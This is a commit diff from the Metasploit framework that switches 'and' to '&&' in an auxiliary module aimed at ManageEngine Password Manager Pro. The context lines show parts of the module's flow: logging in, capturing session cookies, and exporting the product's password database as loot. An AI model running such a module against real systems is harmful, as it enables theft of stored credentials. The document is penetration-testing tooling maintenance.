Favor && over and

bug/bundler_fix
jvazquez-r7 2014-11-10 09:45:12 -06:00
parent ee4924582a
commit 8b8ab61e3d
1 changed files with 5 additions and 5 deletions

View File

@ -57,7 +57,7 @@ class Metasploit3 < Msf::Auxiliary
'uri' => normalize_uri(target_uri.path, 'PassTrixMain.cc')
})
if res and res.code == 200
if res && res.code == 200
# 2nd step: we try to get the ORGN_NAME and AUTHRULE_NAME from the page (which is only needed for the MSP versions)
if res.body.to_s =~ /id="ORGN_NAME" name="ORGN_NAME" value="([\w]*)"/
orgn_name = $1
@ -83,7 +83,7 @@ class Metasploit3 < Msf::Auxiliary
'userName' => username
}
})
if res and res.code == 200
if res && res.code == 200
domain_name = res.body.to_s.strip
else
domain_name = nil
@ -107,14 +107,14 @@ class Metasploit3 < Msf::Auxiliary
'cookie' => cookie,
'vars_post' => vars_post
})
if res and res.code == 302
if res && res.code == 302
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'PassTrixMain.cc'),
'cookie' => cookie,
})
if res and res.code == 200
if res && res.code == 200
# 5th step: get the c ookies sent in the last response
return res.get_cookies
end
@ -259,7 +259,7 @@ class Metasploit3 < Msf::Auxiliary
'RequestType' => 'ExportResources'
}
})
if res and res.code == 200 and res.body.to_s.length > 0
if res && res.code == 200 && res.body.to_s.length > 0
vprint_line(res.body.to_s)
print_good("#{peer} - Successfully exported password database from Password Manager Pro.")
loot_name = 'manageengine.passwordmanagerpro.password.db'